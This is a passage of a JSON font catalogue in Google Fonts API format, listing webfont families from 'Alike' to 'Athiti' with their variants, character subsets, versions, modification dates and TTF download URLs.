        "latin"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/alike/v13/HI_EiYEYI6BIoEjBSZXAQ4-d.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Alike Angular",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/alikeangular/v11/3qTrojWunjGQtEBlIcwMbSoI3kM6bB7FKjE.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Allan",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v13",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/allan/v13/ea8XadU7WuTxEtb2P9SF8nZE.ttf",
        "700": "http://fonts.gstatic.com/s/allan/v13/ea8aadU7WuTxEu5KEPCN2WpNgEKU.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Allerta",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/allerta/v11/TwMO-IAHRlkbx940UnEdSQqO5uY.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Allerta Stencil",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/allertastencil/v11/HTx0L209KT-LmIE9N7OR6eiycOeF-zz313DuvQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Allura",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/allura/v9/9oRPNYsQpS4zjuAPjAIXPtrrGA.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Almarai",
      "variants": [
        "300",
        "regular",
        "700",
        "800"
      ],
      "subsets": [
        "arabic"
      ],
      "version": "v4",
      "lastModified": "2020-09-25",
      "files": {
        "300": "http://fonts.gstatic.com/s/almarai/v4/tssoApxBaigK_hnnS_anhnicoq72sXg.ttf",
        "regular": "http://fonts.gstatic.com/s/almarai/v4/tsstApxBaigK_hnnc1qPonC3vqc.ttf",
        "700": "http://fonts.gstatic.com/s/almarai/v4/tssoApxBaigK_hnnS-aghnicoq72sXg.ttf",
        "800": "http://fonts.gstatic.com/s/almarai/v4/tssoApxBaigK_hnnS_qjhnicoq72sXg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Almendra",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/almendra/v13/H4ckBXKAlMnTn0CskyY6wr-wg763.ttf",
        "italic": "http://fonts.gstatic.com/s/almendra/v13/H4ciBXKAlMnTn0CskxY4yLuShq63czE.ttf",
        "700": "http://fonts.gstatic.com/s/almendra/v13/H4cjBXKAlMnTn0Cskx6G7Zu4qKK-aihq.ttf",
        "700italic": "http://fonts.gstatic.com/s/almendra/v13/H4chBXKAlMnTn0CskxY48Ae9oqacbzhqDtg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Almendra Display",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/almendradisplay/v11/0FlPVOGWl1Sb4O3tETtADHRRlZhzXS_eTyer338.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Almendra SC",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/almendrasc/v11/Iure6Yx284eebowr7hbyTZZJprVA4XQ0.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Amarante",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/amarante/v8/xMQXuF1KTa6EvGx9bq-3C3rAmD-b.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Amaranth",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/amaranth/v11/KtkuALODe433f0j1zPnCF9GqwnzW.ttf",
        "italic": "http://fonts.gstatic.com/s/amaranth/v11/KtkoALODe433f0j1zMnAHdWIx2zWD4I.ttf",
        "700": "http://fonts.gstatic.com/s/amaranth/v11/KtkpALODe433f0j1zMF-OPWi6WDfFpuc.ttf",
        "700italic": "http://fonts.gstatic.com/s/amaranth/v11/KtkrALODe433f0j1zMnAJWmn42T9E4ucRY8.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Amatic SC",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "hebrew",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v15",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/amaticsc/v15/TUZyzwprpvBS1izr_vO0De6ecZQf1A.ttf",
        "700": "http://fonts.gstatic.com/s/amaticsc/v15/TUZ3zwprpvBS1izr_vOMscG6eb8D3WTy-A.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Amethysta",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/amethysta/v9/rP2Fp2K15kgb_F3ibfWIGDWCBl0O8Q.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Amiko",
      "variants": [
        "regular",
        "600",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/amiko/v5/WwkQxPq1DFK04tqlc17MMZgJ.ttf",
        "600": "http://fonts.gstatic.com/s/amiko/v5/WwkdxPq1DFK04uJ9XXrEGoQAUco5.ttf",
        "700": "http://fonts.gstatic.com/s/amiko/v5/WwkdxPq1DFK04uIZXHrEGoQAUco5.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Amiri",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "arabic",
        "latin",
        "latin-ext"
      ],
      "version": "v16",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/amiri/v16/J7aRnpd8CGxBHqUpvrIw74NL.ttf",
        "italic": "http://fonts.gstatic.com/s/amiri/v16/J7afnpd8CGxBHpUrtLYS6pNLAjk.ttf",
        "700": "http://fonts.gstatic.com/s/amiri/v16/J7acnpd8CGxBHp2VkZY4xJ9CGyAa.ttf",
        "700italic": "http://fonts.gstatic.com/s/amiri/v16/J7aanpd8CGxBHpUrjAo9zptgHjAavCA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Amita",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/amita/v7/HhyaU5si9Om7PQlvAfSKEZZL.ttf",
        "700": "http://fonts.gstatic.com/s/amita/v7/HhyXU5si9Om7PTHTLtCCOopCTKkI.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Anaheim",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/anaheim/v8/8vII7w042Wp87g4G0UTUEE5eK_w.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Andada",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/andada/v12/uK_y4riWaego3w9RCh0TMv6EXw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Andika",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/andika/v12/mem_Ya6iyW-LwqgAbbwRWrwGVA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Angkor",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/angkor/v13/H4cmBXyAlsPdnlb-8iw-4Lqggw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Annie Use Your Telescope",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/annieuseyourtelescope/v11/daaLSS4tI2qYYl3Jq9s_Hu74xwktnlKxH6osGVGjlDfB3UUVZA.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Anonymous Pro",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "greek",
        "latin",
        "latin-ext"
      ],
      "version": "v14",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/anonymouspro/v14/rP2Bp2a15UIB7Un-bOeISG3pLlw89CH98Ko.ttf",
        "italic": "http://fonts.gstatic.com/s/anonymouspro/v14/rP2fp2a15UIB7Un-bOeISG3pHl428AP44Kqr2Q.ttf",
        "700": "http://fonts.gstatic.com/s/anonymouspro/v14/rP2cp2a15UIB7Un-bOeISG3pFuAT0CnW7KOywKo.ttf",
        "700italic": "http://fonts.gstatic.com/s/anonymouspro/v14/rP2ap2a15UIB7Un-bOeISG3pHl4OTCzc6IG30KqB9Q.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Antic",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/antic/v12/TuGfUVB8XY5DRaZLodgzydtk.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Antic Didone",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/anticdidone/v9/RWmPoKKX6u8sp8fIWdnDKqDiqYsGBGBzCw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Antic Slab",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/anticslab/v9/bWt97fPFfRzkCa9Jlp6IWcJWXW5p5Qo.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Anton",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v12",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/anton/v12/1Ptgg87LROyAm0K08i4gS7lu.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Arapey",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/arapey/v9/-W__XJn-UDDA2RC6Z9AcZkIzeg.ttf",
        "italic": "http://fonts.gstatic.com/s/arapey/v9/-W_9XJn-UDDA2RCKZdoYREcjeo0k.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Arbutus",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/arbutus/v10/NaPYcZ7dG_5J3poob9JtryO8fMU.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Arbutus Slab",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/arbutusslab/v9/oY1Z8e7OuLXkJGbXtr5ba7ZVa68dJlaFAQ.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Architects Daughter",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/architectsdaughter/v11/KtkxAKiDZI_td1Lkx62xHZHDtgO_Y-bvfY5q4szgE-Q.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Archivo",
      "variants": [
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v7",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/archivo/v7/k3kQo8UDI-1M0wlSTd7iL0nAMaM.ttf",
        "italic": "http://fonts.gstatic.com/s/archivo/v7/k3kSo8UDI-1M0wlSfdzoK2vFIaOV8A.ttf",
        "500": "http://fonts.gstatic.com/s/archivo/v7/k3kVo8UDI-1M0wlSdSrLC0HrLaqM6Q4.ttf",
        "500italic": "http://fonts.gstatic.com/s/archivo/v7/k3kXo8UDI-1M0wlSfdzQ30LhKYiJ-Q7m8w.ttf",
        "600": "http://fonts.gstatic.com/s/archivo/v7/k3kVo8UDI-1M0wlSdQbMC0HrLaqM6Q4.ttf",
        "600italic": "http://fonts.gstatic.com/s/archivo/v7/k3kXo8UDI-1M0wlSfdzQ80XhKYiJ-Q7m8w.ttf",
        "700": "http://fonts.gstatic.com/s/archivo/v7/k3kVo8UDI-1M0wlSdWLNC0HrLaqM6Q4.ttf",
        "700italic": "http://fonts.gstatic.com/s/archivo/v7/k3kXo8UDI-1M0wlSfdzQl0ThKYiJ-Q7m8w.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Archivo Black",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/archivoblack/v10/HTxqL289NzCGg4MzN6KJ7eW6OYuP_x7yx3A.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Archivo Narrow",
      "variants": [
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/archivonarrow/v12/tss0ApVBdCYD5Q7hcxTE1ArZ0Yb3g31S2s8p.ttf",
        "italic": "http://fonts.gstatic.com/s/archivonarrow/v12/tss2ApVBdCYD5Q7hcxTE1ArZ0bb1iXlw398pJxk.ttf",
        "500": "http://fonts.gstatic.com/s/archivonarrow/v12/tss3ApVBdCYD5Q7hcxTE1ArZ0b4Dqlla8dMgPgBu.ttf",
        "500italic": "http://fonts.gstatic.com/s/archivonarrow/v12/tssxApVBdCYD5Q7hcxTE1ArZ0bb1sY1Z-9cCOxBu_BM.ttf",
        "600": "http://fonts.gstatic.com/s/archivonarrow/v12/tss3ApVBdCYD5Q7hcxTE1ArZ0b4vrVla8dMgPgBu.ttf",
        "600italic": "http://fonts.gstatic.com/s/archivonarrow/v12/tssxApVBdCYD5Q7hcxTE1ArZ0bb1saFe-9cCOxBu_BM.ttf",
        "700": "http://fonts.gstatic.com/s/archivonarrow/v12/tss3ApVBdCYD5Q7hcxTE1ArZ0b5LrFla8dMgPgBu.ttf",
        "700italic": "http://fonts.gstatic.com/s/archivonarrow/v12/tssxApVBdCYD5Q7hcxTE1ArZ0bb1scVf-9cCOxBu_BM.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Aref Ruqaa",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "arabic",
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-11-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/arefruqaa/v12/WwkbxPW1E165rajQKDulEIAiVNo5xNY.ttf",
        "700": "http://fonts.gstatic.com/s/arefruqaa/v12/WwkYxPW1E165rajQKDulKDwNcNIS2N_7Bdk.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Arima Madurai",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "tamil",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/arimamadurai/v6/t5t4IRoeKYORG0WNMgnC3seB1V3PqrGCch4Drg.ttf",
        "200": "http://fonts.gstatic.com/s/arimamadurai/v6/t5t7IRoeKYORG0WNMgnC3seB1fHuipusfhcat2c.ttf",
        "300": "http://fonts.gstatic.com/s/arimamadurai/v6/t5t7IRoeKYORG0WNMgnC3seB1ZXtipusfhcat2c.ttf",
        "regular": "http://fonts.gstatic.com/s/arimamadurai/v6/t5tmIRoeKYORG0WNMgnC3seB7TnFrpOHYh4.ttf",
        "500": "http://fonts.gstatic.com/s/arimamadurai/v6/t5t7IRoeKYORG0WNMgnC3seB1c3sipusfhcat2c.ttf",
        "700": "http://fonts.gstatic.com/s/arimamadurai/v6/t5t7IRoeKYORG0WNMgnC3seB1YXqipusfhcat2c.ttf",
        "800": "http://fonts.gstatic.com/s/arimamadurai/v6/t5t7IRoeKYORG0WNMgnC3seB1Znpipusfhcat2c.ttf",
        "900": "http://fonts.gstatic.com/s/arimamadurai/v6/t5t7IRoeKYORG0WNMgnC3seB1b3oipusfhcat2c.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Arimo",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "hebrew",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v15",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/arimo/v15/P5sMzZCDf9_T_20eziBMjI-u.ttf",
        "italic": "http://fonts.gstatic.com/s/arimo/v15/P5sCzZCDf9_T_10cxCRuiZ-uydg.ttf",
        "700": "http://fonts.gstatic.com/s/arimo/v15/P5sBzZCDf9_T_1Wi4QREp5On0ME2.ttf",
        "700italic": "http://fonts.gstatic.com/s/arimo/v15/P5sHzZCDf9_T_10c_JhBrZeF1dE2PY4.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Arizonia",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/arizonia/v11/neIIzCemt4A5qa7mv6WGHK06UY30.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Armata",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/armata/v12/gokvH63_HV5jQ-E9lD53Q2u_mQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Arsenal",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/arsenal/v5/wXKrE3kQtZQ4pF3D11_WAewrhXY.ttf",
        "italic": "http://fonts.gstatic.com/s/arsenal/v5/wXKpE3kQtZQ4pF3D513cBc4ulXYrtA.ttf",
        "700": "http://fonts.gstatic.com/s/arsenal/v5/wXKuE3kQtZQ4pF3D7-P5JeQAmX8yrdk.ttf",
        "700italic": "http://fonts.gstatic.com/s/arsenal/v5/wXKsE3kQtZQ4pF3D513kueEKnV03vdnKjw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Artifika",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/artifika/v11/VEMyRoxzronptCuxu6Wt5jDtreOL.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Arvo",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v14",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/arvo/v14/tDbD2oWUg0MKmSAa7Lzr7vs.ttf",
        "italic": "http://fonts.gstatic.com/s/arvo/v14/tDbN2oWUg0MKqSIQ6J7u_vvijQ.ttf",
        "700": "http://fonts.gstatic.com/s/arvo/v14/tDbM2oWUg0MKoZw1yLTA8vL7lAE.ttf",
        "700italic": "http://fonts.gstatic.com/s/arvo/v14/tDbO2oWUg0MKqSIoVLHK9tD-hAHkGg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Arya",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/arya/v6/ga6CawNG-HJd9Ub1-beqdFE.ttf",
        "700": "http://fonts.gstatic.com/s/arya/v6/ga6NawNG-HJdzfra3b-BaFg3dRE.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Asap",
      "variants": [
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v13",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/asap/v13/KFOoCniXp96a-zwU4UROGzY.ttf",
        "italic": "http://fonts.gstatic.com/s/asap/v13/KFOmCniXp96ayz4e5WZLCzYlKw.ttf",
        "500": "http://fonts.gstatic.com/s/asap/v13/KFOnCniXp96aw8g9xUxlBz88MsA.ttf",
        "500italic": "http://fonts.gstatic.com/s/asap/v13/KFOlCniXp96ayz4mEU9vAx05IsDqlA.ttf",
        "600": "http://fonts.gstatic.com/s/asap/v13/KFOnCniXp96aw-Q6xUxlBz88MsA.ttf",
        "600italic": "http://fonts.gstatic.com/s/asap/v13/KFOlCniXp96ayz4mPUhvAx05IsDqlA.ttf",
        "700": "http://fonts.gstatic.com/s/asap/v13/KFOnCniXp96aw4A7xUxlBz88MsA.ttf",
        "700italic": "http://fonts.gstatic.com/s/asap/v13/KFOlCniXp96ayz4mWUlvAx05IsDqlA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Asap Condensed",
      "variants": [
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v7",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/asapcondensed/v7/pxidypY1o9NHyXh3WvSbGSggdNeLYk1Mq3ap.ttf",
        "italic": "http://fonts.gstatic.com/s/asapcondensed/v7/pxifypY1o9NHyXh3WvSbGSggdOeJaElurmapvvM.ttf",
        "500": "http://fonts.gstatic.com/s/asapcondensed/v7/pxieypY1o9NHyXh3WvSbGSggdO9_S2lEgGqgp-pO.ttf",
        "500italic": "http://fonts.gstatic.com/s/asapcondensed/v7/pxiYypY1o9NHyXh3WvSbGSggdOeJUL1Him6CovpOkXA.ttf",
        "600": "http://fonts.gstatic.com/s/asapcondensed/v7/pxieypY1o9NHyXh3WvSbGSggdO9TTGlEgGqgp-pO.ttf",
        "600italic": "http://fonts.gstatic.com/s/asapcondensed/v7/pxiYypY1o9NHyXh3WvSbGSggdOeJUJFAim6CovpOkXA.ttf",
        "700": "http://fonts.gstatic.com/s/asapcondensed/v7/pxieypY1o9NHyXh3WvSbGSggdO83TWlEgGqgp-pO.ttf",
        "700italic": "http://fonts.gstatic.com/s/asapcondensed/v7/pxiYypY1o9NHyXh3WvSbGSggdOeJUPVBim6CovpOkXA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Asar",
      "variants": [
        "regular"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/asar/v8/sZlLdRyI6TBIXkYQDLlTW6E.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Asset",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-15",
      "files": {
        "regular": "http://fonts.gstatic.com/s/asset/v10/SLXGc1na-mM4cWImRJqExst1.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Assistant",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "hebrew",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-10-22",
      "files": {
        "200": "http://fonts.gstatic.com/s/assistant/v6/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtmZnEGGf3qGuvM4.ttf",
        "300": "http://fonts.gstatic.com/s/assistant/v6/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtrhnEGGf3qGuvM4.ttf",
        "regular": "http://fonts.gstatic.com/s/assistant/v6/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtuZnEGGf3qGuvM4.ttf",
        "500": "http://fonts.gstatic.com/s/assistant/v6/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQttRnEGGf3qGuvM4.ttf",
        "600": "http://fonts.gstatic.com/s/assistant/v6/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtjhgEGGf3qGuvM4.ttf",
        "700": "http://fonts.gstatic.com/s/assistant/v6/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtgFgEGGf3qGuvM4.ttf",
        "800": "http://fonts.gstatic.com/s/assistant/v6/2sDPZGJYnIjSi6H75xkZZE1I0yCmYzzQtmZgEGGf3qGuvM4.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Astloch",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/astloch/v12/TuGRUVJ8QI5GSeUjq9wRzMtkH1Q.ttf",
        "700": "http://fonts.gstatic.com/s/astloch/v12/TuGUUVJ8QI5GSeUjk2A-6MNPA10xLMQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Asul",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/asul/v10/VuJ-dNjKxYr46fMFXK78JIg.ttf",
        "700": "http://fonts.gstatic.com/s/asul/v10/VuJxdNjKxYr40U8qeKbXOIFneRo.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Athiti",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "200": "http://fonts.gstatic.com/s/athiti/v5/pe0sMISdLIZIv1wAxDNyAv2-C99ycg.ttf",
